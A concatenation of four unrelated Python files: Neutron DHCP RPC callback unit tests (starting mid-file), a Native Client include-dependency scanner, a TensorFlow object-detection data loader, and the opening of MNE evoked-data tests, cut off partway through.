self._test__port_action_with_failures(
exc=db_exc.DBReferenceError('a', 'b', 'c', 'd'),
action='create_port')
def test_create_port_catch_ip_generation_failure_reraise(self):
self.assertRaises(
n_exc.IpAddressGenerationFailure,
self._test__port_action_with_failures,
exc=n_exc.IpAddressGenerationFailure(net_id='foo_network_id'),
action='create_port')
def test_create_port_catch_and_handle_ip_generation_failure(self):
self.plugin.get_subnet.side_effect = (
n_exc.SubnetNotFound(subnet_id='foo_subnet_id'))
self._test__port_action_with_failures(
exc=n_exc.IpAddressGenerationFailure(net_id='foo_network_id'),
action='create_port')
self._test__port_action_with_failures(
exc=n_exc.InvalidInput(error_message='sorry'),
action='create_port')
def test_update_port_missing_port_on_get(self):
self.plugin.get_port.side_effect = n_exc.PortNotFound(port_id='66')
self.assertIsNone(self.callbacks.update_dhcp_port(
context='ctx', host='host', port_id='66',
port={'port': {'network_id': 'a'}}))
def test_update_port_missing_port_on_update(self):
self.plugin.get_port.return_value = {
'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
self.plugin.update_port.side_effect = n_exc.PortNotFound(port_id='66')
self.assertIsNone(self.callbacks.update_dhcp_port(
context='ctx', host='host', port_id='66',
port={'port': {'network_id': 'a'}}))
def test_get_network_info_return_none_on_not_found(self):
self.plugin.get_network.side_effect = n_exc.NetworkNotFound(net_id='a')
retval = self.callbacks.get_network_info(mock.Mock(), network_id='a')
self.assertIsNone(retval)
def _test_get_network_info(self, segmented_network=False,
routed_network=False):
network_retval = dict(id='a')
if not routed_network:
subnet_retval = [dict(id='a'), dict(id='c'), dict(id='b')]
else:
subnet_retval = [dict(id='c', segment_id='1'),
dict(id='a', segment_id='1')]
port_retval = mock.Mock()
self.plugin.get_network.return_value = network_retval
self.plugin.get_subnets.return_value = subnet_retval
self.plugin.get_ports.return_value = port_retval
if segmented_network:
self.segment_plugin.get_segments.return_value = [dict(id='1'),
dict(id='2')]
self.segment_plugin.get_segments_by_hosts.return_value = ['1']
retval = self.callbacks.get_network_info(mock.Mock(), network_id='a')
self.assertEqual(retval, network_retval)
if not routed_network:
sorted_subnet_retval = [dict(id='a'), dict(id='b'), dict(id='c')]
else:
sorted_subnet_retval = [dict(id='a', segment_id='1'),
dict(id='c', segment_id='1')]
self.assertEqual(retval['subnets'], sorted_subnet_retval)
self.assertEqual(retval['ports'], port_retval)
def test_get_network_info(self):
self._test_get_network_info()
def test_get_network_info_with_routed_network(self):
self.get_service_plugins.return_value = {
'segments': self.segment_plugin
}
self._test_get_network_info(segmented_network=True,
routed_network=True)
def test_get_network_info_with_segmented_network_but_not_routed(self):
self.get_service_plugins.return_value = {
'segments': self.segment_plugin
}
self._test_get_network_info(segmented_network=True)
def test_get_network_info_with_non_segmented_network(self):
self.get_service_plugins.return_value = {
'segments': self.segment_plugin
}
self._test_get_network_info()
def test_update_dhcp_port_verify_port_action_port_dict(self):
port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
}
expected_port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
portbindings.HOST_ID: 'foo_host',
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
},
'id': 'foo_port_id'
}
def _fake_port_action(plugin, context, port, action):
self.assertEqual(expected_port, port)
self.plugin.get_port.return_value = {
'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
self.callbacks._port_action = _fake_port_action
self.callbacks.update_dhcp_port(mock.Mock(),
host='foo_host',
port_id='foo_port_id',
port=port)
def test_update_reserved_dhcp_port(self):
port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
}
expected_port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
portbindings.HOST_ID: 'foo_host',
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
},
'id': 'foo_port_id'
}
def _fake_port_action(plugin, context, port, action):
self.assertEqual(expected_port, port)
self.plugin.get_port.return_value = {
'device_id': utils.get_dhcp_agent_device_id('foo_network_id',
'foo_host')}
self.callbacks._port_action = _fake_port_action
self.callbacks.update_dhcp_port(
mock.Mock(), host='foo_host', port_id='foo_port_id', port=port)
self.plugin.get_port.return_value = {
'device_id': 'other_id'}
self.assertRaises(exceptions.DhcpPortInUse,
self.callbacks.update_dhcp_port,
mock.Mock(),
host='foo_host',
port_id='foo_port_id',
port=port)
def test_update_dhcp_port(self):
port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]}
}
expected_port = {'port': {'network_id': 'foo_network_id',
'device_owner': constants.DEVICE_OWNER_DHCP,
portbindings.HOST_ID: 'foo_host',
'fixed_ips': [{'subnet_id': 'foo_subnet_id'}]
},
'id': 'foo_port_id'
}
self.plugin.get_port.return_value = {
'device_id': n_const.DEVICE_ID_RESERVED_DHCP_PORT}
self.callbacks.update_dhcp_port(mock.Mock(),
host='foo_host',
port_id='foo_port_id',
port=port)
self.plugin.assert_has_calls([
mock.call.update_port(mock.ANY, 'foo_port_id', expected_port)])
def test_release_dhcp_port(self):
port_retval = dict(id='port_id', fixed_ips=[dict(subnet_id='a')])
self.plugin.get_ports.return_value = [port_retval]
self.callbacks.release_dhcp_port(mock.ANY, network_id='netid',
device_id='devid')
self.plugin.assert_has_calls([
mock.call.delete_ports_by_device_id(mock.ANY, 'devid', 'netid')])
def test_dhcp_ready_on_ports(self):
context = mock.Mock()
port_ids = range(10)
with mock.patch.object(provisioning_blocks,
'provisioning_complete') as pc:
self.callbacks.dhcp_ready_on_ports(context, port_ids)
calls = [mock.call(context, port_id, resources.PORT,
provisioning_blocks.DHCP_ENTITY)
for port_id in port_ids]
pc.assert_has_calls(calls)
| |
#!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
"""Header Scanner.
This module will scan a set of input sources for include dependencies. Use
the command-line switch -Ixxxx to add include paths. All filenames and paths
are expected and returned with POSIX separators.
"""
debug = False
def DebugPrint(txt):
if debug: print txt
class PathConverter(object):
"""PathConverter does path manipulates using Posix style pathnames.
Regardless of the native path type, all inputs and outputs to the path
functions are with POSIX style separators.
"""
def ToNativePath(self, pathname):
return os.path.sep.join(pathname.split('/'))
def ToPosixPath(self, pathname):
return '/'.join(pathname.split(os.path.sep))
def isfile(self, pathname):
ospath = self.ToNativePath(pathname)
return os.path.isfile(ospath)
def getcwd(self):
return self.ToPosixPath(os.getcwd())
def isabs(self, pathname):
ospath = self.ToNativePath(pathname)
return os.path.isabs(ospath)
def isdir(self, pathname):
ospath = self.ToNativePath(pathname)
return os.path.isdir(ospath)
def open(self, pathname):
ospath = self.ToNativePath(pathname)
return open(ospath)
def abspath(self, pathname):
ospath = self.ToNativePath(pathname)
ospath = os.path.abspath(ospath)
return self.ToPosixPath(ospath)
def dirname(self, pathname):
ospath = self.ToNativePath(pathname)
ospath = os.path.dirname(ospath)
return self.ToPosixPath(ospath)
filename_to_relative_cache = {} # (filepath, basepath) -> relpath
findfile_cache = {} # (tuple(searchdirs), cwd, file) -> filename/None
pathisfile_cache = {} # abspath -> boolean, works because fs is static
# during a run.
class Resolver(object):
"""Resolver finds and generates relative paths for include files.
The Resolver object provides a mechanism to to find and convert a source or
include filename into a relative path based on provided search paths. All
paths use POSIX style separator.
"""
def __init__(self, pathobj=PathConverter()):
self.search_dirs = []
self.pathobj = pathobj
self.cwd = self.pathobj.getcwd()
self.offs = len(self.cwd)
def AddOneDirectory(self, pathname):
"""Add an include search path."""
pathname = self.pathobj.abspath(pathname)
DebugPrint('Adding DIR: %s' % pathname)
if pathname not in self.search_dirs:
if self.pathobj.isdir(pathname):
self.search_dirs.append(pathname)
else:
# We can end up here when using the gyp generator analyzer. To avoid
# spamming only log if debug enabled.
DebugPrint('Not a directory: %s\n' % pathname)
return False
return True
def RemoveOneDirectory(self, pathname):
"""Remove an include search path."""
pathname = self.pathobj.abspath(pathname)
DebugPrint('Removing DIR: %s' % pathname)
if pathname in self.search_dirs:
self.search_dirs.remove(pathname)
return True
def AddDirectories(self, pathlist):
"""Add list of space separated directories."""
failed = False
dirlist = ' '.join(pathlist)
for dirname in dirlist.split(' '):
if not self.AddOneDirectory(dirname):
failed = True
return not failed
def GetDirectories(self):
return self.search_dirs
def RealToRelative(self, filepath, basepath):
"""Returns a relative path from an absolute basepath and filepath."""
cache_key = (filepath, basepath)
cache_result = None
if cache_key in filename_to_relative_cache:
cache_result = filename_to_relative_cache[cache_key]
return cache_result
def SlowRealToRelative(filepath, basepath):
path_parts = filepath.split('/')
base_parts = basepath.split('/')
while path_parts and base_parts and path_parts[0] == base_parts[0]:
path_parts = path_parts[1:]
base_parts = base_parts[1:]
rel_parts = ['..'] * len(base_parts) + path_parts
rel_path = '/'.join(rel_parts)
return rel_path
rel_path = SlowRealToRelative(filepath, basepath)
filename_to_relative_cache[cache_key] = rel_path
return rel_path
def FilenameToRelative(self, filepath):
"""Returns a relative path from CWD to filepath."""
filepath = self.pathobj.abspath(filepath)
basepath = self.cwd
return self.RealToRelative(filepath, basepath)
def FindFile(self, filename):
"""Search for <filename> across the search directories, if the path is not
absolute. Return the filepath relative to the CWD or None. """
cache_key = (tuple(self.search_dirs), self.cwd, filename)
if cache_key in findfile_cache:
cache_result = findfile_cache[cache_key]
return cache_result
result = None
def isfile(absname):
res = pathisfile_cache.get(absname)
if res is None:
res = self.pathobj.isfile(absname)
pathisfile_cache[absname] = res
return res
if self.pathobj.isabs(filename):
if isfile(filename):
result = self.FilenameToRelative(filename)
else:
for pathname in self.search_dirs:
fullname = '%s/%s' % (pathname, filename)
if isfile(fullname):
result = self.FilenameToRelative(fullname)
break
findfile_cache[cache_key] = result
return result
def LoadFile(filename):
# Catch cases where the file does not exist
try:
fd = PathConverter().open(filename)
except IOError:
DebugPrint('Exception on file: %s' % filename)
return ''
# Go ahead and throw if you fail to read
return fd.read()
scan_cache = {} # cache (abs_filename -> include_list)
class Scanner(object):
"""Scanner searches for '#include' to find dependencies."""
def __init__(self, loader=None):
regex = r'^\s*\#[ \t]*include[ \t]*[<"]([^>"]+)[>"]'
self.parser = re.compile(regex, re.M)
self.loader = loader
if not loader:
self.loader = LoadFile
def ScanData(self, data):
"""Generate a list of includes from this text block."""
return self.parser.findall(data)
def ScanFile(self, filename):
"""Generate a list of includes from this filename."""
abs_filename = os.path.abspath(filename)
if abs_filename in scan_cache:
return scan_cache[abs_filename]
includes = self.ScanData(self.loader(filename))
scan_cache[abs_filename] = includes
DebugPrint('Source %s contains:\n\t%s' % (filename, '\n\t'.join(includes)))
return includes
class WorkQueue(object):
"""WorkQueue contains the list of files to be scanned.
WorkQueue contains provides a queue of files to be processed. The scanner
will attempt to push new items into the queue, which will be ignored if the
item is already in the queue. If the item is new, it will be added to the
work list, which is drained by the scanner.
"""
def __init__(self, resolver, scanner=Scanner()):
self.added_set = set()
self.todo_list = list()
self.scanner = scanner
self.resolver = resolver
def PushIfNew(self, filename):
"""Add this dependency to the list of not already there."""
DebugPrint('Adding %s' % filename)
resolved_name = self.resolver.FindFile(filename)
if not resolved_name:
DebugPrint('Failed to resolve %s' % filename)
return
DebugPrint('Resolvd as %s' % resolved_name)
if resolved_name in self.added_set:
return
self.todo_list.append(resolved_name)
self.added_set.add(resolved_name)
def PopIfAvail(self):
"""Fetch the next dependency to search."""
if not self.todo_list:
return None
return self.todo_list.pop()
def Run(self):
"""Search through the available dependencies until the list becomes empty.
The list must be primed with one or more source files to search."""
scan_name = self.PopIfAvail()
while scan_name:
includes = self.scanner.ScanFile(scan_name)
# Add the directory of the current scanned file for resolving includes
# while processing includes for this file.
scan_dir = PathConverter().dirname(scan_name)
added_dir = not self.resolver.AddOneDirectory(scan_dir)
for include_file in includes:
self.PushIfNew(include_file)
if added_dir:
self.resolver.RemoveOneDirectory(scan_dir)
scan_name = self.PopIfAvail()
return self.added_set
def DoMain(argv):
"""Entry point used by gyp's pymod_do_main feature."""
global debug
resolver = Resolver()
files = []
arg_type = ''
for arg in argv:
if arg in ['-I', '-S']:
arg_type = arg
elif arg == '-D':
debug = True
elif arg_type == '-I':
# Skip generated include directories. These files may not exist and
# there should be explicit dependency on the target that generates
# these files.
if arg.startswith('$!PRODUCT_DIR'):
continue
resolver.AddDirectories([arg])
elif arg_type == '-S':
files.append(arg)
workQ = WorkQueue(resolver)
for filename in files:
workQ.PushIfNew(filename)
sources_set = workQ.Run()
# If any of the original files requested aren't found, add them anyway.
# This is so that source files that will be generated are still returned in
# the program output.
sources_set = sources_set.union(set(files))
sorted_list = sorted(sources_set)
return '\n'.join(sorted_list) + '\n'
def Main():
result = DoMain(sys.argv[1:])
sys.stdout.write(result)
if __name__ == '__main__':
Main()
| |
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Data loader and processing."""
from absl import logging
import tensorflow as tf
import utils
from tf2 import anchors
from object_detection import preprocessor
from object_detection import tf_example_decoder
class InputProcessor:
"""Base class of Input processor."""
def __init__(self, image, output_size):
"""Initializes a new `InputProcessor`.
Args:
image: The input image before processing.
output_size: The output image size after calling resize_and_crop_image
function.
"""
self._image = image
if isinstance(output_size, int):
self._output_size = (output_size, output_size)
else:
self._output_size = output_size
# Parameters to control rescaling and shifting during preprocessing.
# Image scale defines scale from original image to scaled image.
self._image_scale = tf.constant(1.0)
# The integer height and width of scaled image.
self._scaled_height = tf.shape(image)[0]
self._scaled_width = tf.shape(image)[1]
# The x and y translation offset to crop scaled image to the output size.
self._crop_offset_y = tf.constant(0)
self._crop_offset_x = tf.constant(0)
@property
def image(self):
return self._image
@image.setter
def image(self, image):
self._image = image
def normalize_image(self, mean_rgb, stddev_rgb):
"""Normalize the image to zero mean and unit variance."""
# The image normalization is identical to Cloud TPU ResNet.
self._image = tf.cast(self._image, dtype=tf.float32)
self._image -= tf.constant(mean_rgb, shape=(1, 1, 3), dtype=tf.float32)
self._image /= tf.constant(stddev_rgb, shape=(1, 1, 3), dtype=tf.float32)
return self._image
def set_training_random_scale_factors(self,
scale_min,
scale_max,
target_size=None):
"""Set the parameters for multiscale training.
Notably, if train and eval use different sizes, then target_size should be
set as eval size to avoid the discrency between train and eval.
Args:
scale_min: minimal scale factor.
scale_max: maximum scale factor.
target_size: targeted size, usually same as eval. If None, use train size.
"""
if not target_size:
target_size = self._output_size
target_size = utils.parse_image_size(target_size)
logging.info('target_size = %s, output_size = %s', target_size,
self._output_size)
# Select a random scale factor.
random_scale_factor = tf.random.uniform([], scale_min, scale_max)
scaled_y = tf.cast(random_scale_factor * target_size[0], tf.int32)
scaled_x = tf.cast(random_scale_factor * target_size[1], tf.int32)
# Recompute the accurate scale_factor using rounded scaled image size.
height = tf.cast(tf.shape(self._image)[0], tf.float32)
width = tf.cast(tf.shape(self._image)[1], tf.float32)
image_scale_y = tf.cast(scaled_y, tf.float32) / height
image_scale_x = tf.cast(scaled_x, tf.float32) / width
image_scale = tf.minimum(image_scale_x, image_scale_y)
# Select non-zero random offset (x, y) if scaled image is larger than
# self._output_size.
scaled_height = tf.cast(height * image_scale, tf.int32)
scaled_width = tf.cast(width * image_scale, tf.int32)
offset_y = tf.cast(scaled_height - self._output_size[0], tf.float32)
offset_x = tf.cast(scaled_width - self._output_size[1], tf.float32)
offset_y = tf.maximum(0.0, offset_y) * tf.random.uniform([], 0, 1)
offset_x = tf.maximum(0.0, offset_x) * tf.random.uniform([], 0, 1)
offset_y = tf.cast(offset_y, tf.int32)
offset_x = tf.cast(offset_x, tf.int32)
self._image_scale = image_scale
self._scaled_height = scaled_height
self._scaled_width = scaled_width
self._crop_offset_x = offset_x
self._crop_offset_y = offset_y
def set_scale_factors_to_output_size(self):
"""Set the parameters to resize input image to self._output_size."""
# Compute the scale_factor using rounded scaled image size.
height = tf.cast(tf.shape(self._image)[0], tf.float32)
width = tf.cast(tf.shape(self._image)[1], tf.float32)
image_scale_y = tf.cast(self._output_size[0], tf.float32) / height
image_scale_x = tf.cast(self._output_size[1], tf.float32) / width
image_scale = tf.minimum(image_scale_x, image_scale_y)
scaled_height = tf.cast(height * image_scale, tf.int32)
scaled_width = tf.cast(width * image_scale, tf.int32)
self._image_scale = image_scale
self._scaled_height = scaled_height
self._scaled_width = scaled_width
def resize_and_crop_image(self, method=tf.image.ResizeMethod.BILINEAR):
"""Resize input image and crop it to the self._output dimension."""
dtype = self._image.dtype
scaled_image = tf.image.resize(
self._image, [self._scaled_height, self._scaled_width], method=method)
scaled_image = scaled_image[self._crop_offset_y:self._crop_offset_y +
self._output_size[0],
self._crop_offset_x:self._crop_offset_x +
self._output_size[1], :]
output_image = tf.image.pad_to_bounding_box(scaled_image, 0, 0,
self._output_size[0],
self._output_size[1])
self._image = tf.cast(output_image, dtype)
return self._image
class DetectionInputProcessor(InputProcessor):
"""Input processor for object detection."""
def __init__(self, image, output_size, boxes=None, classes=None):
InputProcessor.__init__(self, image, output_size)
self._boxes = boxes
self._classes = classes
def random_horizontal_flip(self):
"""Randomly flip input image and bounding boxes."""
self._image, self._boxes = preprocessor.random_horizontal_flip(
self._image, boxes=self._boxes)
def clip_boxes(self, boxes):
"""Clip boxes to fit in an image."""
ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)
ymin = tf.clip_by_value(ymin, 0, self._output_size[0] - 1)
xmin = tf.clip_by_value(xmin, 0, self._output_size[1] - 1)
ymax = tf.clip_by_value(ymax, 0, self._output_size[0] - 1)
xmax = tf.clip_by_value(xmax, 0, self._output_size[1] - 1)
boxes = tf.stack([ymin, xmin, ymax, xmax], axis=1)
return boxes
def resize_and_crop_boxes(self):
"""Resize boxes and crop it to the self._output dimension."""
boxlist = preprocessor.box_list.BoxList(self._boxes)
# boxlist is in range of [0, 1], so here we pass the scale_height/width
# instead of just scale.
boxes = preprocessor.box_list_scale(boxlist, self._scaled_height,
self._scaled_width).get()
# Adjust box coordinates based on the offset.
box_offset = tf.stack([
self._crop_offset_y,
self._crop_offset_x,
self._crop_offset_y,
self._crop_offset_x,
])
boxes -= tf.cast(tf.reshape(box_offset, [1, 4]), tf.float32)
# Clip the boxes.
boxes = self.clip_boxes(boxes)
# Filter out ground truth boxes that are illegal.
indices = tf.where(
tf.not_equal((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]),
0))
boxes = tf.gather_nd(boxes, indices)
classes = tf.gather_nd(self._classes, indices)
return boxes, classes
@property
def image_scale(self):
# Return image scale from original image to scaled image.
return self._image_scale
@property
def image_scale_to_original(self):
# Return image scale from scaled image to original image.
return 1.0 / self._image_scale
@property
def offset_x(self):
return self._crop_offset_x
@property
def offset_y(self):
return self._crop_offset_y
def pad_to_fixed_size(data, pad_value, output_shape):
"""Pad data to a fixed length at the first dimension.
Args:
data: Tensor to be padded to output_shape.
pad_value: A constant value assigned to the paddings.
output_shape: The output shape of a 2D tensor.
Returns:
The Padded tensor with output_shape [max_instances_per_image, dimension].
"""
max_instances_per_image = output_shape[0]
dimension = output_shape[1]
data = tf.reshape(data, [-1, dimension])
num_instances = tf.shape(data)[0]
msg = 'ERROR: please increase config.max_instances_per_image'
with tf.control_dependencies(
[tf.assert_less(num_instances, max_instances_per_image, message=msg)]):
pad_length = max_instances_per_image - num_instances
paddings = pad_value * tf.ones([pad_length, dimension])
padded_data = tf.concat([data, paddings], axis=0)
padded_data = tf.reshape(padded_data, output_shape)
return padded_data
class InputReader:
"""Input reader for dataset."""
def __init__(self,
file_pattern,
is_training,
use_fake_data=False,
max_instances_per_image=None,
debug=False):
self._file_pattern = file_pattern
self._is_training = is_training
self._use_fake_data = use_fake_data
# COCO has 100 limit, but users may set different values for custom dataset.
self._max_instances_per_image = max_instances_per_image or 100
self._debug = debug
@tf.autograph.experimental.do_not_convert
def dataset_parser(self, value, example_decoder, anchor_labeler, params):
"""Parse data to a fixed dimension input image and learning targets.
Args:
value: a single serialized tf.Example string.
example_decoder: TF example decoder.
anchor_labeler: anchor box labeler.
params: a dict of extra parameters.
Returns:
image: Image tensor that is preprocessed to have normalized value and
fixed dimension [image_height, image_width, 3]
cls_targets_dict: ordered dictionary with keys
[min_level, min_level+1, ..., max_level]. The values are tensor with
shape [height_l, width_l, num_anchors]. The height_l and width_l
represent the dimension of class logits at l-th level.
box_targets_dict: ordered dictionary with keys
[min_level, min_level+1, ..., max_level]. The values are tensor with
shape [height_l, width_l, num_anchors * 4]. The height_l and
width_l represent the dimension of bounding box regression output at
l-th level.
num_positives: Number of positive anchors in the image.
source_id: Source image id. Default value -1 if the source id is empty
in the groundtruth annotation.
image_scale: Scale of the processed image to the original image.
boxes: Groundtruth bounding box annotations. The box is represented in
[y1, x1, y2, x2] format. The tensor is padded with -1 to the fixed
dimension [self._max_instances_per_image, 4].
is_crowds: Groundtruth annotations to indicate if an annotation
represents a group of instances by value {0, 1}. The tensor is
padded with 0 to the fixed dimension [self._max_instances_per_image].
areas: Groundtruth areas annotations. The tensor is padded with -1
to the fixed dimension [self._max_instances_per_image].
classes: Groundtruth classes annotations. The tensor is padded with -1
to the fixed dimension [self._max_instances_per_image].
"""
with tf.name_scope('parser'):
data = example_decoder.decode(value)
source_id = data['source_id']
image = data['image']
boxes = data['groundtruth_boxes']
classes = data['groundtruth_classes']
classes = tf.reshape(tf.cast(classes, dtype=tf.float32), [-1, 1])
areas = data['groundtruth_area']
is_crowds = data['groundtruth_is_crowd']
image_masks = data.get('groundtruth_instance_masks', [])
classes = tf.reshape(tf.cast(classes, dtype=tf.float32), [-1, 1])
if self._is_training:
# Training time preprocessing.
if params['skip_crowd_during_training']:
indices = tf.where(tf.logical_not(data['groundtruth_is_crowd']))
classes = tf.gather_nd(classes, indices)
boxes = tf.gather_nd(boxes, indices)
if params.get('grid_mask', None):
from aug import gridmask # pylint: disable=g-import-not-at-top
image, boxes = gridmask.gridmask(image, boxes)
if params.get('autoaugment_policy', None):
from aug import autoaugment # pylint: disable=g-import-not-at-top
if params['autoaugment_policy'] == 'randaug':
image, boxes = autoaugment.distort_image_with_randaugment(
image, boxes, num_layers=1, magnitude=15)
else:
image, boxes = autoaugment.distort_image_with_autoaugment(
image, boxes, params['autoaugment_policy'])
input_processor = DetectionInputProcessor(image, params['image_size'],
boxes, classes)
input_processor.normalize_image(params['mean_rgb'], params['stddev_rgb'])
if self._is_training:
if params['input_rand_hflip']:
input_processor.random_horizontal_flip()
input_processor.set_training_random_scale_factors(
params['jitter_min'], params['jitter_max'],
params.get('target_size', None))
else:
input_processor.set_scale_factors_to_output_size()
image = input_processor.resize_and_crop_image()
boxes, classes = input_processor.resize_and_crop_boxes()
# Assign anchors.
(cls_targets, box_targets,
num_positives) = anchor_labeler.label_anchors(boxes, classes)
source_id = tf.where(
tf.equal(source_id, tf.constant('')), '-1', source_id)
source_id = tf.strings.to_number(source_id)
# Pad groundtruth data for evaluation.
image_scale = input_processor.image_scale_to_original
boxes *= image_scale
is_crowds = tf.cast(is_crowds, dtype=tf.float32)
boxes = pad_to_fixed_size(boxes, -1, [self._max_instances_per_image, 4])
is_crowds = pad_to_fixed_size(is_crowds, 0,
[self._max_instances_per_image, 1])
areas = pad_to_fixed_size(areas, -1, [self._max_instances_per_image, 1])
classes = pad_to_fixed_size(classes, -1,
[self._max_instances_per_image, 1])
if params['scale_range']:
image = image * 2.0 / 255 - 1.0
if params['mixed_precision']:
dtype = tf.keras.mixed_precision.global_policy().compute_dtype
image = tf.cast(image, dtype=dtype)
box_targets = tf.nest.map_structure(
lambda box_target: tf.cast(box_target, dtype=dtype), box_targets)
return (image, cls_targets, box_targets, num_positives, source_id,
image_scale, boxes, is_crowds, areas, classes, image_masks)
@tf.autograph.experimental.do_not_convert
def process_example(self, params, batch_size, images, cls_targets,
box_targets, num_positives, source_ids, image_scales,
boxes, is_crowds, areas, classes, image_masks):
"""Processes one batch of data."""
labels = {}
# Count num_positives in a batch.
num_positives_batch = tf.reduce_mean(num_positives)
labels['mean_num_positives'] = tf.reshape(
tf.tile(tf.expand_dims(num_positives_batch, 0), [
batch_size,
]), [batch_size, 1])
if params['data_format'] == 'channels_first':
images = tf.transpose(images, [0, 3, 1, 2])
for level in range(params['min_level'], params['max_level'] + 1):
labels['cls_targets_%d' % level] = cls_targets[level]
labels['box_targets_%d' % level] = box_targets[level]
if params['data_format'] == 'channels_first':
labels['cls_targets_%d' % level] = tf.transpose(
labels['cls_targets_%d' % level], [0, 3, 1, 2])
labels['box_targets_%d' % level] = tf.transpose(
labels['box_targets_%d' % level], [0, 3, 1, 2])
# Concatenate groundtruth annotations to a tensor.
groundtruth_data = tf.concat([boxes, is_crowds, areas, classes], axis=2)
labels['source_ids'] = source_ids
labels['groundtruth_data'] = groundtruth_data
labels['image_scales'] = image_scales
labels['image_masks'] = image_masks
return images, labels
@property
def dataset_options(self):
options = tf.data.Options()
options.deterministic = self._debug or not self._is_training
options.experimental_optimization.map_parallelization = True
options.experimental_optimization.parallel_batch = True
return options
def __call__(self, params, input_context=None, batch_size=None):
input_anchors = anchors.Anchors(params['min_level'], params['max_level'],
params['num_scales'],
params['aspect_ratios'],
params['anchor_scale'],
params['image_size'])
anchor_labeler = anchors.AnchorLabeler(input_anchors, params['num_classes'])
example_decoder = tf_example_decoder.TfExampleDecoder(
include_mask='segmentation' in params['heads'],
regenerate_source_id=params['regenerate_source_id']
)
batch_size = batch_size or params['batch_size']
seed = params.get('tf_random_seed', None)
dataset = tf.data.Dataset.list_files(
self._file_pattern, shuffle=self._is_training, seed=seed)
if input_context:
dataset = dataset.shard(input_context.num_input_pipelines,
input_context.input_pipeline_id)
# Prefetch data from files.
def _prefetch_dataset(filename):
if params.get('dataset_type', None) == 'sstable':
pass
else:
dataset = tf.data.TFRecordDataset(filename).prefetch(1)
return dataset
dataset = dataset.interleave(
_prefetch_dataset, num_parallel_calls=tf.data.AUTOTUNE, deterministic=bool(seed))
dataset = dataset.with_options(self.dataset_options)
if self._is_training:
dataset = dataset.shuffle(64, seed=seed)
# Parse the fetched records to input tensors for model function.
# pylint: disable=g-long-lambda
if params.get('dataset_type', None) == 'sstable':
map_fn = lambda key, value: self.dataset_parser(value, example_decoder,
anchor_labeler, params)
else:
map_fn = lambda value: self.dataset_parser(value, example_decoder,
anchor_labeler, params)
# pylint: enable=g-long-lambda
dataset = dataset.map(
map_fn, num_parallel_calls=tf.data.AUTOTUNE)
dataset = dataset.prefetch(batch_size)
dataset = dataset.batch(batch_size, drop_remainder=params['drop_remainder'])
dataset = dataset.map(
lambda *args: self.process_example(params, batch_size, *args))
dataset = dataset.prefetch(tf.data.AUTOTUNE)
if self._is_training:
dataset = dataset.repeat()
if self._use_fake_data:
# Turn this dataset into a semi-fake dataset which always loop at the
# first batch. This reduces variance in performance and is useful in
# testing.
dataset = dataset.take(1).cache().repeat()
return dataset
| |
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
from copy import deepcopy
import warnings
import numpy as np
from scipy import fftpack
from numpy.testing import (assert_array_almost_equal, assert_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_true, assert_raises, assert_not_equal
from mne import (equalize_channels, pick_types, read_evokeds, write_evokeds,
grand_average, combine_evoked, create_info, read_events,
Epochs, EpochsArray)
from mne.evoked import _get_peak, Evoked, EvokedArray
from mne.io import read_raw_fif
from mne.tests.common import assert_naming
from mne.utils import (_TempDir, requires_pandas, slow_test, requires_version,
run_tests_if_main)
from mne.externals.six.moves import cPickle as pickle
warnings.simplefilter('always')
base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
fname = op.join(base_dir, 'test-ave.fif')
fname_gz = op.join(base_dir, 'test-ave.fif.gz')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_name = op.join(base_dir, 'test-eve.fif')
def test_decim():
"""Test evoked decimation."""
rng = np.random.RandomState(0)
n_epochs, n_channels, n_times = 5, 10, 20
dec_1, dec_2 = 2, 3
decim = dec_1 * dec_2
sfreq = 1000.
sfreq_new = sfreq / decim
data = rng.randn(n_epochs, n_channels, n_times)
events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
info = create_info(n_channels, sfreq, 'eeg')
info['lowpass'] = sfreq_new / float(decim)
epochs = EpochsArray(data, info, events)
data_epochs = epochs.copy().decimate(decim).get_data()
data_epochs_2 = epochs.copy().decimate(decim, offset=1).get_data()
data_epochs_3 = epochs.decimate(dec_1).decimate(dec_2).get_data()
assert_array_equal(data_epochs, data[:, :, ::decim])
assert_array_equal(data_epochs_2, data[:, :, 1::decim])
assert_array_equal(data_epochs, data_epochs_3)
# Now let's do it with some real data
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
events = read_events(event_name)
sfreq_new = raw.info['sfreq'] / decim
raw.info['lowpass'] = sfreq_new / 4. # suppress aliasing warnings
picks = pick_types(raw.info, meg=True, eeg=True, exclude=())
epochs = Epochs(raw, events, 1, -0.2, 0.5, picks=picks, preload=True,
add_eeg_ref=False)
